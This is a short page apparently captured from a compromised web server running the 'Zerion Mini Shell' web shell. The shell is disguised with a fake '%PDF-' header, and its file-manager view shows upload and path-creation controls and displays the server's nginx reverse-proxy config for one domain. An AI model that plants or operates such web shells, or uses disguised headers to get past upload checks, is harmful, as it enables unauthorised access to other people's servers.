%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /etc/nginx/conf.d/
Upload File :
Create Path :
Current File : //etc/nginx/conf.d/react.conf

server {
    listen 8050;
    server_name code.j2hb.com;

    location / {
        proxy_set_header   X-Forwarded-For $remote_addr;
        proxy_set_header   Host $http_host;
        proxy_pass         http://localhost:3000;
    }
}

Zerion Mini Shell 1.0